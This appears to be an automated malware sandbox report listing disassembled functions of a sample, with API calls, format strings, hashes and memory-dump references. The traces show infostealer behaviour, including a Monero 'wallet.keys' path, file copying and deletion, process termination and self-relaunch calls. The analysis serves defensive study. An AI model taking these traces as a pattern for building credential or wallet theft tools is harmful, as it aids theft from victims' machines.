Opcode ID: 34c833818564eb85dccdd9dd41c1e80a0de9913bb5ece254b917f615fd130b43
Instruction ID: 7f0b50e83e0cd3841d211201cf64e5b24c54196dcea9b155ca45fce482bb4dc3
Opcode Fuzzy Hash: 34c833818564eb85dccdd9dd41c1e80a0de9913bb5ece254b917f615fd130b43
Instruction Fuzzy Hash: 2A21BA75D1420DABCF04EFE8D945AEEB7B5FF48304F04856AE506E3250EB345605CBA9

Function 00B99260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0133E3A0,?,?,?,00B9140C,?,0133E3A0,00000000), ref: 00B9926C
lstrcpyn.KERNEL32(00DCAB88,0133E3A0,0133E3A0,?,00B9140C,?,0133E3A0), ref: 00B99290
lstrlen.KERNEL32(?,?,00B9140C,?,0133E3A0), ref: 00B992A7
wsprintfA.USER32 ref: 00B992C7

Strings

%s%s, xrefs: 00B992B5

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 9d55b403b5270edbd98bb0e3de7a0223bd62b01853e3d68f93dfe6c6cb253e22
Instruction ID: ab313ecc6bde592662217d532e1d88cb00b58ae29a3b47f61a37a5107b6ce808
Opcode Fuzzy Hash: 9d55b403b5270edbd98bb0e3de7a0223bd62b01853e3d68f93dfe6c6cb253e22
Instruction Fuzzy Hash: 7601977550020DFFCB04DFACC988EAE7BB9EB44359F148648F9099B344C635AA509BA1

Function 00B96630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B96663

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

ShellExecuteEx.SHELL32(0000003C), ref: 00B96726
ExitProcess.KERNEL32 ref: 00B96755

Strings

<, xrefs: 00B966D9

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 66fd0a2b730a3783a0bf0e596c8cecbbc2d92efaf40c5f67f8ef6cd663440df8
Instruction ID: cb02cf5558410370059c1a17cc9daa91706045de19c7646f9abd4dc66b83c556
Opcode Fuzzy Hash: 66fd0a2b730a3783a0bf0e596c8cecbbc2d92efaf40c5f67f8ef6cd663440df8
Instruction Fuzzy Hash: 703150B1C01219ABDB14EB94DC86FDDB7BCAF04300F405199F209A6191DF746B48CFAA

Function 00B987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BA0E28,00000000,?), ref: 00B9882F
RtlAllocateHeap.NTDLL(00000000), ref: 00B98836
wsprintfA.USER32 ref: 00B98850

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Strings

%dx%d, xrefs: 00B98847

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 778ef17f5e37b5724801fcbf99e33d684d0cb993e7064e6473b3e2b5952d5c8a
Instruction ID: 444620ce1505cb1e64ff6d253db850f79a13bb6db966d04f81b054ebea204706
Opcode Fuzzy Hash: 778ef17f5e37b5724801fcbf99e33d684d0cb993e7064e6473b3e2b5952d5c8a
Instruction Fuzzy Hash: A6211AB1A4030AABDB04DF98DD49FAEBBB8FB48705F104159F605E7390C779A9008BB1

Function 00B98D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B9951E,00000000), ref: 00B98D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00B98D62
wsprintfW.USER32 ref: 00B98D78

Strings

%hs, xrefs: 00B98D6F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 4f95f46f71c87895b1086c7239a028aa536d8d73e037377fa3f744511e9afc32
Instruction ID: 49481d5c218b00cae72a34b175e8ebf28721e80df7d022e332b914174dbd0537
Opcode Fuzzy Hash: 4f95f46f71c87895b1086c7239a028aa536d8d73e037377fa3f744511e9afc32
Instruction Fuzzy Hash: 23E08CB0A4030EBBDB00DB98DC0AE6977B8EB0470AF000195FD09C7380DA719E009BA6

Function 00B8D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B98B60: GetSystemTime.KERNEL32(00BA0E1A,0133A2B0,00BA05AE,?,?,00B813F9,?,0000001A,00BA0E1A,00000000,?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B98B86

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B8D481
lstrlen.KERNEL32(00000000), ref: 00B8D698
lstrlen.KERNEL32(00000000), ref: 00B8D6AC
DeleteFileA.KERNEL32(00000000), ref: 00B8D72B

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 6b9c39dc9b382818947a8057971f6e527b0defafbc384340c015ccda9126ead3
Instruction ID: c1f2c4e1fa99b3939cf6f5288a2fe0d9ef49a01d28d1728188cccff3746e61b2
Opcode Fuzzy Hash: 6b9c39dc9b382818947a8057971f6e527b0defafbc384340c015ccda9126ead3
Instruction Fuzzy Hash: 9D91FD729101199BDF04FBA4DC96EEE73B8AF14304F5045B9F506B61A1EF346A09CBB2

Function 00B93560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: dd74c103e8543d0b1cbb57288dcb8c640da0812de0c7d2c26854a1c64cbd71dd
Instruction ID: d450bc157b82e9d7924929dc391090adc5d361a65b9b3b0e8892dad53bac6f23
Opcode Fuzzy Hash: dd74c103e8543d0b1cbb57288dcb8c640da0812de0c7d2c26854a1c64cbd71dd
Instruction Fuzzy Hash: 9D412D71D14209AFCF04EFE4D895AFEB7F8EF54704F008468E51676290EB75AA05CBA2

Function 00B994D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B994EB

Part of subcall function 00B98D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B9951E,00000000), ref: 00B98D5B
Part of subcall function 00B98D50: RtlAllocateHeap.NTDLL(00000000), ref: 00B98D62
Part of subcall function 00B98D50: wsprintfW.USER32 ref: 00B98D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00B995AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B995C9
CloseHandle.KERNEL32(00000000), ref: 00B995D6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 6af3a9da2d2776ca3c8bfac8c99f72de9dbf79a499b1b650090a412e311c4418
Instruction ID: 1dd4fc7fb74078627c16a2c9f7e535bde9f36c46ccc0b1a4e41e40bfb5f37268
Opcode Fuzzy Hash: 6af3a9da2d2776ca3c8bfac8c99f72de9dbf79a499b1b650090a412e311c4418
Instruction Fuzzy Hash: C2311B71A0030DABDF14DBD4CD49FEEB7B8FF54704F104469E506AA284DB74AA89CB61

Function 00B992E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00B93AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B93AEE,?), ref: 00B992FC
GetFileSizeEx.KERNEL32(000000FF,00B93AEE), ref: 00B99319
CloseHandle.KERNEL32(000000FF), ref: 00B99327

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
